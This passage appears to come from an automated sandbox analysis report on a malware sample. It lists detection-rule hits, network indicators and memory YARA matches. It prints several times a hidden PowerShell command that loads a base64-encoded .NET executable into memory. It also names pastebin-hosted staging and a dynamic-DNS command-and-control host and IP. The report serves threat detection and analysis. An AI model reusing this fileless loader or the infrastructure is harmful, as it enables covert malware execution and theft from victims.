z4AAAoWFhcg/w8PABcUcz8AAAoWFHNAAAAKb0EAAAoCBigTAAAGKpYgAAwAACgtAAAKcy4AA
        Source: Process startedAuthor: Teymur Kheirkhabarov (idea), Vasiliy Burov (rule), oscd.community, Tim Shelton (fp): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('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
        Source: Process startedAuthor: Florian Roth (Nextron Systems): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('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
        Source: Process startedAuthor: frack113: Data: Command: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine: "C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe", CommandLine|base64offset|contains: , Image: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, NewProcessName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, OriginalFileName: C:\Windows\Microsoft.NET\Framework\v4.0.30319\aspnet_compiler.exe, ParentCommandLine: "powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('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
        Source: Process startedAuthor: frack113: Data: Command: "powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('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
        Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "powershell.exe" -ExecutionPolicy Bypass -NoProfile -WindowStyle Hidden -NoExit -command [System.Reflection.Assembly]::Load([System.Convert]::FromBase64String('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
        Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 656, ProcessCommandLine: C:\Windows\System32\svchost.exe -k netsvcs -p -s BITS, ProcessId: 7140, ProcessName: svchost.exe
        No Suricata rule has matched

        Click to jump to signature section

        Show All Signature Results
        Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.16:49702 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.16:49703 version: TLS 1.2

        Networking

        barindex
        Source: unknownDNS query: name: paste.ee
        Source: unknownDNS query: name: pastebin.com
        Source: global trafficTCP traffic: 192.168.2.16:49704 -> 193.34.212.115:444
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
        Source: global trafficDNS traffic detected: DNS query: paste.ee
        Source: global trafficDNS traffic detected: DNS query: pastebin.com
        Source: global trafficDNS traffic detected: DNS query: ydekmoviess.sytes.net
        Source: unknownNetwork traffic detected: HTTP traffic on port 49702 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 49703 -> 443
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49703
        Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49702
        Source: unknownHTTPS traffic detected: 104.21.84.67:443 -> 192.168.2.16:49702 version: TLS 1.2
        Source: unknownHTTPS traffic detected: 104.20.3.235:443 -> 192.168.2.16:49703 version: TLS 1.2

        Key, Mouse, Clipboard, Microphone and Screen Capturing

        barindex
        Source: Yara matchFile source: 0000000F.00000002.1735219264.000001FA636A6000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2420233433.0000000000402000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2427144968.0000000003405000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000010.00000002.2424988500.00000000014F6000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
